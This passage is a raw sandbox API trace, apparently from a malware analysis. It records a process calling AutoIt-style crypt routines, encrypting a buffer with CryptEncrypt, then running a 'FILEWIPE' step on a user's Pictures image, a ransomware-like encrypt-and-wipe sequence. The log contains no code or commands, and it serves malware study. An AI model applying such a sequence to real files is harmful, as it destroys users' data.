wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.479] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.479] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.479] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.479] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.480] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.480] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.481] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa27d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa280) returned 1 [0190.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.482] CharLowerBuffW (in: lpsz="byte[41601]", cchLength=0xb | out: lpsz="byte[41601]") returned 0xb [0190.482] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.484] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.484] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa27d, dwBufLen=0xa280 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa280) returned 1 [0190.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.485] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.487] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.488] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.488] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.488] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0190.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.516] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.516] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0190.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.516] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.516] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0190.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.516] CryptDestroyKey (hKey=0x90aed8) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.517] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.517] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.517] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0190.517] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.517] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.518] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0190.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.518] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.518] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.518] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.518] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0190.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.518] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.519] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.519] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.521] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.521] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.521] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0x90ae18 [0190.521] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0190.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.521] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.522] CharLowerBuffW (in: lpsz="byte[41597]", cchLength=0xb | out: lpsz="byte[41597]") returned 0xb [0190.522] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.522] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.522] HeapFree (in: hHeap=0x8a0000, 